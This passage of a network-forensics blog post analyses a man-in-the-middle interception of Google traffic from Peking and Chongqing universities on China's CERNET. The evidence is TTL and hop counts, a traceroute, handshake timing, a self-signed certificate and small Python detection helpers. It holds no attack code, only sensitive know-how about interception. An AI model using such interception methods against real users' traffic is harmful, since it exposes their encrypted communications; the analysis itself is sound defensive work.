[TR]
[TD]Chongqing University[/TD] [TD]CQU6-CERNET2[/TD] [TD]Sep 1, 2014[/TD] [TD]google_fake.pcapng[/TD] [TD]3bf943ea453f9afa 5c06b9c126d79557[/TD]
[/TR]
[/TABLE]

Client and Server IP Addresses

The analyzed capture files contain pure IPv6 traffic (CERNET is an IPv6 network), which made the analysis a bit different than usual. We do not disclose the client IP addresses for privacy reasons, but they both seem legit; one from Peking University (netname PKU6-CERNET2) and the other from Chongqing University (CQU6-CERNET2). Both IP addresses belong to AS23910, named "China Next Generation Internet CERNET2".

Peking University entrance by galaygobi. Licensed under Creative Commons Attribution 2.0
Chongqing University gate by Brooktse. Licensed under Creative Commons Attribution-Share Alike 3.0

The IP addresses received for Google were in both cases also legit, so the MITM wasn't carried out through DNS spoofing. The Peking University client connected to 2607:f8b0:4007:804::1013 (GOOGLE-IPV6 in United States) and the connection from Chongqing University went to 2404:6800:4005:805::1010 (GOOGLE_IPV6_AP-20080930 in Australia).

Time-To-Live (TTL) Analysis

The Time-To-Live (TTL) values received in the IP packets from Google were in both cases 248 or 249 (note: TTL is actually called ”Hop Limit” in IPv6 nomenclature, but we prefer to use the well established term ”TTL” anyway). The highest possible TTL value is 255, which means that the received packets hadn't made more than 6 or 7 router hops before ending up at the client.
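The hop arithmetic here is simple enough to script. A sketch assuming the packets left the server with the common initial TTL of 255 (64 and 128 are the other usual defaults, which is why this stays a heuristic), compared against the roughly 14 hops expected on this route:

```python
def estimated_hops(observed_ttl: int, initial_ttl: int = 255) -> int:
    """Each router decrements the TTL (IPv6: Hop Limit) by one, so the
    hop count is the assumed initial value minus what we captured."""
    return initial_ttl - observed_ttl

def looks_like_mitm(observed_ttl: int, expected_hops: int, slack: int = 3) -> bool:
    """Flag a reply path that is far shorter than the known route."""
    return estimated_hops(observed_ttl) < expected_hops - slack

# TTL values 248 and 249 were seen in the captures.
print(estimated_hops(248), looks_like_mitm(248, expected_hops=14))
```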
However, the expected number of router hops between a server on GOOGLE-IPV6 and the client at Peking University is around 14. The low number of router hops is a clear indication of an IP MITM taking place.

CapLoader with both capture files loaded, showing TTL values

Here is an IPv6 traceroute from AS25795 in Los Angeles towards the IP address at Peking University (generated with ARP Networks' 4or6.com tool):

#traceroute -6 2001:da8:201:1374:8ea9:82ff:fe3c:322
 1 2607:f2f8:1600::1 (2607:f2f8:1600::1) 1.636 ms 1.573 ms 1.557 ms
 2 2001:504:13::1a (2001:504:13::1a) 40.381 ms 40.481 ms 40.565 ms
 3 * * *
 4 2001:252:0:302::1 (2001:252:0:302::1) 148.409 ms 148.501 ms 148.595 ms
 5 * * *
 6 2001:252:0:1::1 (2001:252:0:1::1) 148.273 ms 147.620 ms 147.596 ms
 7 pku-bj-v6.cernet2.net (2001:da8:1:1b::2) 147.574 ms 147.619 ms 147.420 ms
 8 2001:da8:1:50d::2 (2001:da8:1:50d::2) 148.582 ms 148.670 ms 148.979 ms
 9 cernet2.net (2001:da8:ac:ffff::2) 147.963 ms 147.956 ms 147.988 ms
10 2001:da8:[REDACTED] 147.964 ms 148.035 ms 147.895 ms
11 2001:da8:[REDACTED] 147.832 ms 147.881 ms 147.836 ms
12 2001:da8:[REDACTED] 147.809 ms 147.707 ms 147.899 ms

As can be seen in the traceroute above, seven hops before the client we find the 2001:252::/32 network, which is called “CNGI International Gateway Network (CNGIIGN)”. This network is actually part of CERNET, but on AS23911, which is the network that connects CERNET with its external peers. A reasonable assumption is therefore that the MITM is carried out on the 2001:252::/32 network, or where AS23910 (2001:da8:1::2) connects to AS23911 (2001:252:0:1::1). This means that the MITM attack is being conducted from within China.

Response Time Analysis

The round-trip time between the client and server can be estimated by measuring the time from when the client sends its initial TCP SYN packet to when it receives a TCP SYN+ACK from the server.
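This SYN/SYN+ACK timing can be turned into a physical sanity check: light in fiber covers roughly 200 km per millisecond, so half the round-trip time bounds how far away the responder can possibly be. A sketch (the 200 km/ms figure is a rule of thumb, and the ~9000 km Beijing-to-US distance is an approximation, neither taken from the original post):

```python
def max_server_distance_km(rtt_ms: float, km_per_ms: float = 200.0) -> float:
    """Upper bound on server distance: the signal travels out and back,
    so the one-way distance is at most rtt/2 times propagation speed."""
    return (rtt_ms / 2.0) * km_per_ms

def rtt_is_plausible(rtt_ms: float, real_distance_km: float) -> bool:
    """A genuine response cannot arrive faster than light in fiber allows."""
    return max_server_distance_km(rtt_ms) >= real_distance_km

# An 8 ms handshake bounds the responder to ~800 km, far short of a
# server in the US (~9000 km away from Beijing).
print(max_server_distance_km(8), rtt_is_plausible(8, 9000))
```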
The expected round-trip time for connecting from CERNET to a Google server overseas would be around 150 ms or more. However, in the captures we have analyzed, the TCP SYN+ACK packet was received in just 8 ms (Peking) and 52 ms (Chongqing) respectively. Again, this is a clear indication of an IP MITM taking place, since Google cannot possibly send a response from the US to CERNET within 8 ms, regardless of how fast they are. The fast response times also indicate that the machine performing the MITM is located fairly close to the network at Peking University. Even though the machine performing the MITM was very quick at performing the TCP three-way handshake, we noticed that the application-layer communication was terribly slow. The specification for the TLS handshake (RFC 2246) defines that a ClientHello message should be responded to with a ServerHello. Google typically sends its ServerHello response almost instantly, i.e. the response is received after one round-trip time (150 ms in this case). However, in the analyzed captures we noticed ServerHello response times of around 500 ms.

X.509 Certificate Analysis

We extracted the X.509 certificates from the two capture files to .cer files using NetworkMiner. We noticed that both users received identical certificates, which were both self-signed for ”google.com”. The fact that the MITM used a self-signed certificate makes the attack easily detectable even for a non-technical user, since the web browser will typically display a warning about the site not being trusted. Additionally, the X.509 certificate was created for ”google.com” rather than ”*.google.com”. This is an obvious miss on the MITM'ers' side, since they were attempting to MITM traffic to ”www.google.com” but not to ”google.com”.
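Certificate fingerprints of the kind extracted with NetworkMiner are nothing more than hashes of the DER-encoded certificate, so they can be computed with the standard library alone. A minimal sketch (the byte string is a placeholder, not the real MITM certificate):

```python
import hashlib

def fingerprints(der_bytes: bytes):
    """SHA1 and MD5 fingerprints of a DER-encoded X.509 certificate,
    the MD5 in the usual colon-separated uppercase form."""
    sha1 = hashlib.sha1(der_bytes).hexdigest()
    md5 = hashlib.md5(der_bytes).hexdigest()
    return sha1, ":".join(md5[i:i + 2] for i in range(0, 32, 2)).upper()

der = b"placeholder certificate bytes"   # substitute the extracted .cer content
sha1_fp, md5_fp = fingerprints(der)
print(sha1_fp, md5_fp)
```

Running this over the extracted .cer file should reproduce the fingerprints a tool like NetworkMiner reports, which is a quick way to confirm two captures really contain the identical certificate.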
NetworkMiner showing the list of X.509 certificates extracted from the two PCAP files

Certificate SHA1 fingerprint: f6beadb9bc02e0a152d71c318739cdecfc1c085d
Certificate MD5 fingerprint: 66:D5:D5:6A:E9:28:51:7C:03:53:C5:E1:33:14:A8:3B

A copy of the fake certificate is available on Google Drive thanks to GreatFire.org.

Conclusions

All evidence indicates that a MITM attack is being conducted against traffic between China’s nationwide education and research network CERNET and Google. It looks as if the MITM is carried out on a network belonging to AS23911, which is the outer part of CERNET that peers with all external networks. This network is located in China, so we can conclude that the MITM was being done within the country. It is difficult to say exactly how the MITM attack was carried out, but we can dismiss DNS spoofing as the method used. A more probable method would be IP hijacking, either through a BGP prefix hijacking or some form of packet injection. However, regardless of how they did it, the attacker would be able to decrypt and inspect the traffic going to Google. We can also conclude that the method used to perform the MITM attack was similar to the Chinese MITM on GitHub, but not identical.

Sursa: Analysis of Chinese MITM on Google - NETRESEC Blog